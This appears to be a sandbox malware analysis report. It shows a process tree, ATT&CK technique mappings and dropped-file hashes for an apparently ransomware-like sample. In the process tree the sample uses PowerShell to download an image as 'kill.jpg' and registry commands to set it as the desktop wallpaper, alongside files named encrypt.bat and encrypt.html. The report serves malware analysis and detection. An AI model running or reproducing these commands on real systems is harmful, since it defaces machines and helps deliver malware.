10⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2228

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
10⤵
- Sets desktop wallpaper using registry
PID:1456

C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
10⤵
PID:4028

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"
8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3916

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
8⤵
- Sets desktop wallpaper using registry
PID:240

C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
8⤵
PID:1580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3044

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
6⤵
- Sets desktop wallpaper using registry
PID:1428

C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
6⤵
PID:4436

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"
4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1448

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
4⤵
- Sets desktop wallpaper using registry
PID:1464

C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
4⤵
PID:1688

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1424

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4628

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Defacement

T1491

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Encrypt\encrypt.bat
Filesize
2KB

MD5
d4b8e7c1b0ee37229b53d8d3c7348af0

SHA1
3467311b4001a759e24b72cf8ec7606219d4c1cc

SHA256
f9f88ccdb3900863a2747809a9e4fe3acd4f52387c2b8e47eebe40bcce5d3fe1

SHA512
fe5bab00cf03784b34475d5bfdd29bd625d12137f6b3a96afa9435833fef639e33e4e5357c772fac829232cea20a9ebd81435d4621173722d04846ee915e2863

Download Submit
C:\Encrypt\encrypt.html
Filesize
1KB

MD5
60722a327960e4b4f5d967101a72ed06

SHA1
04109aaa12c19c7cb4c062b34d4ab4bfe4f52c5e

SHA256
3441d2b980fc2b4504c2308e6ec5da713c6bb0afd0ca9c846eec198cd1e2edfd

SHA512
98812a8546200353ae3c81733963082cbc6f2041b21d3897a5f26b63fbb0b730d81ab438286bdbdaef9eac8bfe3fe81fddabef2c0fd5f000a4279828bfdad896

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
0c705388d79c00418e5c1751159353e3

SHA1
aaeafebce5483626ef82813d286511c1f353f861

SHA256
697bd270be634688c48210bee7c5111d7897fd71a6af0bbb2141cefd2f8e4a4d

SHA512
c1614e79650ab9822c4e175ba528ea4efadc7a6313204e4e69b4a9bd06327fb92f56fba95f2595885b1604ca8d8f6b282ab542988995c674d89901da2bc4186f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
0d84d1490aa9f725b68407eab8f0030e

SHA1
83964574467b7422e160af34ef024d1821d6d1c3

SHA256
40c09bb0248add089873d1117aadefb46c1b4e23241ba4621f707312de9c829e

SHA512
f84552335ff96b5b4841ec26e222c24af79b6d0271d27ad05a9dfcee254a7b9e9019e7fac0def1245a74754fae81f7126499bf1001615073284052aaa949fa00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
0b71dbeaeec2dccab2ad7eb1300e2e5e

SHA1
5eb74cdee6ec8a5f61cf5972d2c6e9352eed3f3c

SHA256
f3049116536ddcae8cdbf91b887b709613789fb44d1cf04e43e7f8a065fa637a

SHA512
d883ef89c5052ee27586a5f680d3bbeaf0417405d43b4435864373b62f6ad4d3a8cdc07159c1c0ddeba9f95083876ae51f3fa6e8631c7a8de523c441b954e155

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
86e972c3edbd82ccc3f2f94909d3862b

SHA1
7f5ce66d31b1049638f1e5b556cafd8247d73cef

SHA256
a7e19cafd4c65d7ee12e7cee1232672138139588e819d770f0139efa0c94f3dd

SHA512
09d4fb4a518b14fb8d96f0b28634d9055b637fb1ae0d55ffd6bb3f62db8d540d654ef38e56d379e41acccd9204728ae1f6e876ee83f4b13276704361d8756561

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
487ee9af221f7fbc5d793b8d863cebb5

SHA1
45645c3378f6125f4148ae4aaa117820517b35a4

SHA256
af4ee259d3a11f381ad89ea911e3d202aa6bac4b9f7d8fd5026a1117e3702586

SHA512
f82e6a06d2aac3f388c72b451ebac90b560cebf675eaa25e1e1440889345010f2ce5a754adef29e542ee95e93066413f1266b17f7184f43f6a189cf4448bedeb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
6903d57eed54e89b68ebb957928d1b99

SHA1
fade011fbf2e4bc044d41e380cf70bd6a9f73212

SHA256
36cbb00b016c9f97645fb628ef72b524dfbdf6e08d626e5c837bbbb9075dcb52

SHA512
c192ea9810fd22de8378269235c1035aa1fe1975a53c876fe4a7acc726c020f94773c21e4e4771133f9fcedb0209f0a5324c594c1db5b28fe1b27644db4fdc9e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
050567a067ffea4eb40fe2eefebdc1ee

SHA1
6e1fb2c7a7976e0724c532449e97722787a00fec

SHA256
3952d5b543e5cb0cb84014f4ad9f5f1b7166f592d28640cbc3d914d0e6f41d2e

SHA512
341ad71ef7e850b10e229666312e4bca87a0ed9fe25ba4b0ab65661d5a0efa855db0592153106da07134d8fc2c6c0e44709bf38183c9a574a1fa543189971259

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
8cb7f4b4ab204cacd1af6b29c2a2042c

SHA1
244540c38e33eac05826d54282a0bfa60340d6a1

SHA256
4994013dabe4f131d401879278eee147add6349124ea6452358dca7e2344c7a6

SHA512
7651cb6863a425840db610253151e271d3e8da26a8c633ce484247266fa226792ecb84b9578df3ab17fef84a5dfcad417b63a7df59c9650a907e08d59b91dd6e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
53baceafe29eabe8b3af161873ec4af4

SHA1
0aa7a23375ea68302e8cdc0ca8fa020a56b4e74c

SHA256
cd12c5808bd48708772c5cc0b53c07941b643c8115bb8042b30ab96a1ceb61c8

SHA512
4166d67c20f6e7ad2843af73735a42391c2651dd8379cac74b4c09963e592dc475613dcd90280735b55ecdda6a2086c5d5d50b07616d9111a609de48b7fad296

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
d71a5f8a2df66cb079e0e224b130afb4

SHA1
93352d5d4dd7ed54cc549c83d1bc93c6bef0ee07

SHA256
fc02b653ffeaab2f023169ff7a675afb4bd029624d5d32e232083fb41d0e21bd

SHA512
7a4e0f20fdb7eb8344a490695e61a8ef551cb41d79548bd4eb4f9f570b0d9a8a76576c8f5be6893d41b3e5bd2a9a9ea3ce7d51788c873036e21fbf38a9bd76c8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
5b705b4839f481b2485f2195c589cad0

SHA1
a55866cd9e6fedf352d0e937101755ea61a50c86

SHA256
f6a3b94a63de605bbbcf1e95cb2d743166f44ea7e9d0d2bfa0e88c94c26e37c6

SHA512
f228eccd5646068a81e79baeaf7e8bfa470b30d503bf0ca8cc746c009510ab609b5c091cadf08fab1e3581900cdb7834c775c61a95a29c2d73ccd0dcbd851bab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
1de2d7d42ca707e3b0cc2a29ac941c71

SHA1
d2b5098ebfbb865b7c6ca0a03b5d507937b719d4

SHA256
aa603aded73532f2b131d6d51122acd235a5ef977b61457faa340175bc5f3ed7

SHA512
19d0639ab7263060b5cbb66efef042c3f8643f01e7bf05b1ef96b41fe69f958a77d809aa064b53a01fa50759fc9fd424353684e5385ef3fd84ea887eb01cd887

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
4914eb0b2ff51bfa48484b5cc8454218

SHA1
6a7c3e36ce53b42497884d4c4a3bda438dd4374b

SHA256
7e510fc9344ef239ab1ab650dc95bb25fd44e2efba8b8246a3ac17880ee8b69e

SHA512
83ab35f622f4a5040ca5cb615a30f83bb0741449225f1fd1815b6923e225c28241d0c02d34f83f743349a5e57f84ca1c6f44016797a93d5985be41d11be79500

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
4d66065a14955310791cd05beeb7d2df

SHA1
66c925bb0099b254911ab193e2ec8736f5bb6549

SHA256
41c50b92f67a35462cf0ed6938b2823e4132b19215da3ba8c9d141e200d1668b

SHA512
817e0330529e08fb6a211b46a636ef089576c11a854c7c0f5eea3021331742acc94558ace24d7d07e27bf5d2b7fda7de1f39e2be506e47a86e9c63397b0c8535

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
e07eea85a8893f23fb814cf4b3ed974c

SHA1
8a8125b2890bbddbfc3531d0ee4393dbbf5936fe

SHA256
83387ce468d717a7b4ba238af2273da873b731a13cc35604f775a31fa0ac70ea

SHA512
9d4808d8a261005391388b85da79e4c5396bdded6e7e5ce3a3a23e7359d1aa1fb983b4324f97e0afec6e8ed9d898322ca258dd7cda654456dd7e84c9cbd509df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
df808b11175970c23f00e611a7b6d2cc

SHA1
0243f099e483fcafb6838c0055982e65634b6db6

SHA256
2d5eec6aeee0c568d08cc1777a67b529dce3133efc761ef4b4643d4b2003d43d

SHA512
c7c4e39be7cb6bfda48055cd2b0b05a6b6a71131a124730f62928600a5870303e06e3db54634c45f86310413126d2524f51002d5f36f7012e41b641992b5ac89

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
9c2a105a0526c8ffc6eba0f5362cc19e

SHA1
b9f391825446df3471067103fbfd0fcd82ce64eb

SHA256
3413480979017187381c1061b6fa59d164cd2cb85bb2c61411eabe9e7c18db13

SHA512
41fcccdeb172eb5128ff7e6608125ece0ff49fb9f7eedfbec282acb09963e0bf0f70a176537e5701633fee6bbc7cd1d422420e4915c4e3ff09a5a121efdef184

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
70094c54af7c5f8183b3649622038851

SHA1
172986877c76784ec5cf0061b80a8cef03c83e2d

SHA256
1b6528c486aaac048f4559cd2c171c7203ff62c29e493e893ae11e53375455a2

SHA512
8c65462486edca400f33ed8f0f3592f629cd2527f9388a75b00249ecacd65b72a497572f99f683579e05b74bfbb10de5e5753aa284b0c0205ca025e0324d92c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
7355f4a1d4e1a2519a4a60ee11f1d192

SHA1
8802bbb71f3e8947c02a7d835b31c7abf4289780

SHA256
2fac16b31607552d8f35d56232cb768ddc2f393c6162d243482466527005f4e3

SHA512
7186100f86bc7a161667583daa5419d3b75acf620892610e0fab26866a4a300795a270bb5009b7af115216569c0d854fe1e3a68121af6f734fc16f7bfaed2d33

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
3b4b2cd164a593da3719d19456ebd35c

SHA1
5c661d81019c2a7b551f1c70ae4cd8bbee58d799

SHA256
c2f30684ebc8660125d54b1459cff22b11d21daf174535f07abb60cc434d18cf

SHA512
9eb38c3703449098fc153be268ed5aacc814299a3593194968511e85539e74513e27484d268b6798f8fa2534c3c2f07d706bf8e688b19715c049215661a1e206

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
55f30089624be31af328ba4e012ae45a

SHA1
121c28de7a5afe828ea395d94be8f5273817b678

SHA256
28e49da06bd64f06a4cf1a9caead354b94b4d11d5dc916a92da0ed96bad00473

SHA512
ef13cc5b22c754c7816e08b421de64bc8df527d7166e970454139410b2d381b53ebf288ec73013cdce92f0ac226d9ed5b342341db52a8cb0b85b5ad4d3090787

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
1189a72e42e2321edf1ed3a8d5568687

SHA1
a2142fc754d6830de107d9d46f398483156f16a6

SHA256
009aee0a5f2d25ed79160e75cde58722def11663334ed20283e3afca32f971ea

SHA512
b1eb9b7aa7a57d0acec93b8152229b1f274a8d1b8f19133513486587f39b0636a9df89ddc6c2013e001d831f2b23cd0bb0fc084131824ea8e1dff134cd6d4f29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
cef328ddb1ee8916e7a658919323edd8

SHA1
a676234d426917535e174f85eabe4ef8b88256a5

SHA256
a1b5b7ada8ebc910f20f91ada3991d3321104e9da598c958b1edac9f9aca0e90

SHA512
747400c20ca5b5fd1b54bc24e75e6a78f15af61df263be932d2ee7b2f34731c2de8ce03b2706954fb098c1ac36f0b761cf37e418738fa91f2a8ea78572f545cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27642\VCRUNTIME140.dll
Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27642\_bz2.pyd
Filesize
83KB

MD5
223fd6748cae86e8c2d5618085c768ac

SHA1
dcb589f2265728fe97156814cbe6ff3303cd05d3

SHA256
f81dc49eac5ecc528e628175add2ff6bda695a93ea76671d7187155aa6326abb

SHA512
9c22c178417b82e68f71e5b7fe7c0c0a77184ee12bd0dc049373eace7fa66c89458164d124a9167ae760ff9d384b78ca91001e5c151a51ad80c824066b8ecce6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27642\_cffi_backend.cp312-win_amd64.pyd
Filesize
178KB

MD5
0572b13646141d0b1a5718e35549577c

SHA1
eeb40363c1f456c1c612d3c7e4923210eae4cdf7

SHA256
d8a76d1e31bbd62a482dea9115fc1a109cb39af4cf6d1323409175f3c93113a7

SHA512
67c28432ca8b389acc26e47eb8c4977fddd4af9214819f89df07fecbc8ed750d5f35807a1b195508dd1d77e2a7a9d7265049dcfbfe7665a7fd1ba45da1e4e842

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27642\_ctypes.pyd
Filesize
122KB

MD5
bbd5533fc875a4a075097a7c6aba865e

SHA1
ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00

SHA256
be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570

SHA512
23ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27642\_decimal.pyd
Filesize
245KB

MD5
3055edf761508190b576e9bf904003aa

SHA1
f0dc8d882b5cd7955cc6dfc8f9834f70a83c7890

SHA256
e4104e47399d3f635a14d649f61250e9fd37f7e65c81ffe11f099923f8532577

SHA512
87538fe20bd2c1150a8fefd0478ffd32e2a9c59d22290464bf5dfb917f6ac7ec874f8b1c70d643a4dc3dd32cbe17e7ea40c0be3ea9dd07039d94ab316f752248

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27642\_hashlib.pyd
Filesize
64KB

MD5
eedb6d834d96a3dffffb1f65b5f7e5be

SHA1
ed6735cfdd0d1ec21c7568a9923eb377e54b308d

SHA256
79c4cde23397b9a35b54a3c2298b3c7a844454f4387cb0693f15e4facd227dd2

SHA512
527bd7bb2f4031416762595f4ce24cbc6254a50eaf2cc160b930950c4f2b3f5e245a486972148c535f8cd80c78ec6fa8c9a062085d60db8f23d4b21e8ae4c0ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27642\_lzma.pyd
Filesize
156KB

MD5
05e8b2c429aff98b3ae6adc842fb56a3

SHA1
834ddbced68db4fe17c283ab63b2faa2e4163824

SHA256
a6e2a5bb7a33ad9054f178786a031a46ea560faeef1fb96259331500aae9154c

SHA512
badeb99795b89bc7c1f0c36becc7a0b2ce99ecfd6f6bb493bda24b8e57e6712e23f4c509c96a28bc05200910beddc9f1536416bbc922331cae698e813cbb50b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27642\_socket.pyd
Filesize
81KB

MD5
dc06f8d5508be059eae9e29d5ba7e9ec

SHA1
d666c88979075d3b0c6fd3be7c595e83e0cb4e82

SHA256
7daff6aa3851a913ed97995702a5dfb8a27cb7cf00fb496597be777228d7564a

SHA512
57eb36bc1e9be20c85c34b0a535b2349cb13405d60e752016e23603c4648939f1150e4dbebc01ec7b43eb1a6947c182ccb8a806e7e72167ad2e9d98d1fd94ab3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27642\base_library.zip
Filesize
1.3MB

MD5
08332a62eb782d03b959ba64013ac5bc

SHA1
b70b6ae91f1bded398ca3f62e883ae75e9966041

SHA256
8584f0eb44456a275e3bc69626e3acad595546fd78de21a946b2eb7d6ba02288

SHA512
a58e4a096d3ce738f6f93477c9a73ddbfcb4b82d212c0a19c0cf9e07f1e62b2f477a5dd468cd31cc5a13a73b93fa17f64d6b516afef2c56d38ede1ace35cf087

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27642\cryptography\hazmat\bindings\_rust.pyd
Filesize
6.9MB

MD5
61d63fbd7dd1871392997dd3cef6cc8e

SHA1
45a0a7f26f51ce77aa1d89f8bedb4af90e755fa9

SHA256
ae3a2936b138a2faa4d0cd6445fae97e441b23f6fdafb1a30e60fd80c37d7df5

SHA512
c31f1f281d354acb424a510d54790ee809364b55425b1d39429e1bb7c379126578260c6f197834339a34833c90e748483aabd426295731f78fcde9580fcd8f9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27642\libcrypto-3.dll
Filesize
5.0MB

MD5
e547cf6d296a88f5b1c352c116df7c0c

SHA1
cafa14e0367f7c13ad140fd556f10f320a039783

SHA256
05fe080eab7fc535c51e10c1bd76a2f3e6217f9c91a25034774588881c3f99de

SHA512
9f42edf04c7af350a00fa4fdf92b8e2e6f47ab9d2d41491985b20cd0adde4f694253399f6a88f4bdd765c4f49792f25fb01e84ec03fd5d0be8bb61773d77d74d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27642\libffi-8.dll
Filesize
38KB

MD5
0f8e4992ca92baaf54cc0b43aaccce21

SHA1
c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

SHA256
eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

SHA512
6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27642\python3.dll
Filesize
66KB

MD5
79b02450d6ca4852165036c8d4eaed1f

SHA1
ce9ff1b302426d4c94a2d3ea81531d3cb9e583e4

SHA256
d2e348e615a5d3b08b0bac29b91f79b32f0c1d0be48976450042462466b51123

SHA512
47044d18db3a4dd58a93b43034f4fafa66821d157dcfefb85fca2122795f4591dc69a82eb2e0ebd9183075184368850e4caf9c9fea0cfe6f766c73a60ffdf416

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27642\python312.dll
Filesize
6.6MB

MD5
3c388ce47c0d9117d2a50b3fa5ac981d

SHA1
038484ff7460d03d1d36c23f0de4874cbaea2c48

SHA256
c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb

SHA512
e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27642\select.pyd
Filesize
29KB

MD5
92b440ca45447ec33e884752e4c65b07

SHA1
5477e21bb511cc33c988140521a4f8c11a427bcc

SHA256
680df34fb908c49410ac5f68a8c05d92858acd111e62d1194d15bdce520bd6c3

SHA512
40e60e1d1445592c5e8eb352a4052db28b1739a29e16b884b0ba15917b058e66196988214ce473ba158704837b101a13195d5e48cb1dc2f07262dfecfe8d8191

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27642\unicodedata.pyd
Filesize
1.1MB

MD5
16be9a6f941f1a2cb6b5fca766309b2c

SHA1
17b23ae0e6a11d5b8159c748073e36a936f3316a

SHA256
10ffd5207eeff5a836b330b237d766365d746c30e01abf0fd01f78548d1f1b04

SHA512
64b7ecc58ae7cf128f03a0d5d5428aaa0d4ad4ae7e7d19be0ea819bbbf99503836bfe4946df8ee3ab8a92331fdd002ab9a9de5146af3e86fef789ce46810796b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4qn5wquu.k4p.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Desktop\kill.jpg
Filesize
498KB

MD5
880e51ca9da8406fd0648c3016ee5034

SHA1
12591660e44431b0f38224df8b5529f8c2589693

SHA256
fb7f87e9b4e33a1be7d67415f59c10b0436f7404c619157e0bce0ea7fa86e99e

SHA512
4a05412ed27086c602ebaa280564d9e60121fa5f758987285c3250789f7b197673cda0d22d2e66f9c5acacf9364fdeb076fc1d5fa28bee9bcc22454500304dcb

Download Submit
\??\pipe\LOCAL\crashpad_3176_RLTXUZUWKKCEGQVT
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1512-210-0x00007FFED90C0000-0x00007FFED9B82000-memory.dmp

Filesize
10.8MB

Download
memory/1512-209-0x00007FFED90C0000-0x00007FFED9B82000-memory.dmp

Filesize
10.8MB

Download
memory/1512-208-0x0000023CC1360000-0x0000023CC1382000-memory.dmp

Filesize
136KB

Download
memory/1512-215-0x00007FFED90C0000-0x00007FFED9B82000-memory.dmp

Filesize
10.8MB

Download
memory/1512-212-0x00007FFED90C0000-0x00007FFED9B82000-memory.dmp

Filesize
10.8MB

Download
memory/1512-211-0x00007FFED90C0000-0x00007FFED9B82000-memory.dmp

Filesize
10.8MB

Download
memory/1512-199-0x00007FFED90C3000-0x00007FFED90C5000-memory.dmp

Filesize
8KB

Download